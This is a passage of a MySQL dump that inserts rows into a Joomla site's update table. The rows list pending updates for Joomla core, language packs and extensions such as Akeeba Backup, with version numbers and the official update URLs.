AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22288,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22289,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22290,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22291,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22292,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22293,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22294,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22295,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22296,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22297,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22298,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22299,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22300,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22301,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22302,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22303,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22304,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22305,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22306,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22307,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22308,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22309,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22310,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22311,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22312,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22313,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22314,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22315,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22316,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22317,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22318,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22319,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22320,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22321,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22322,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22323,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22324,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22325,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22326,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22327,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22328,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22329,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22330,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22331,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22332,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22333,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22334,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22335,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22336,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22337,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22338,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22339,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22340,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22341,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22342,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22343,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22344,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22345,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22346,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22347,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22348,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22349,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22350,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22351,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22352,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22353,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22354,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22355,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22356,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22357,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22358,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22359,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22360,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22361,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22362,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22363,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22364,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22365,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22366,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22367,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22368,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22369,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22370,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22371,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22372,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22373,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22374,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22375,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22376,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22377,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22378,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22379,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22380,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22381,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22382,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22383,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22384,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22385,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22386,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22387,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22388,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22389,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22390,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22391,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22392,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22393,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22394,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22395,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22396,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22397,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22398,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22399,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22400,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html','');
INSERT INTO `fw3gt_updates` VALUES (22401,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22402,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22403,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22404,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22405,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22406,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22407,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22408,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22409,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22410,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22411,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22412,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22413,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22414,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22415,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22416,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22417,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22418,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22419,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22420,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22421,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22422,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22423,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22424,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22425,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22426,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22427,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22428,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22429,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22430,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22431,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22432,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22433,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22434,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22435,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22436,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22437,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22438,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22439,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22440,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22441,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22442,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22443,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22444,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22445,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22446,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22447,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22448,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22449,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22450,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22451,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22452,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22453,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22454,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22455,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22456,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22457,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22458,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22459,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22460,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22461,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22462,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22463,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22464,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22465,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22466,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22467,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22468,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22469,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22470,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22471,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22472,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22473,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22474,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22475,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22476,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22477,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22478,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22479,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22480,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22481,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22482,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22483,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22484,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22485,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22486,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22487,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22488,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22489,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22490,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22491,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22492,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22493,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22494,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22495,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22496,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22497,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22498,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22499,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22500,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22501,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22502,57,0,'German 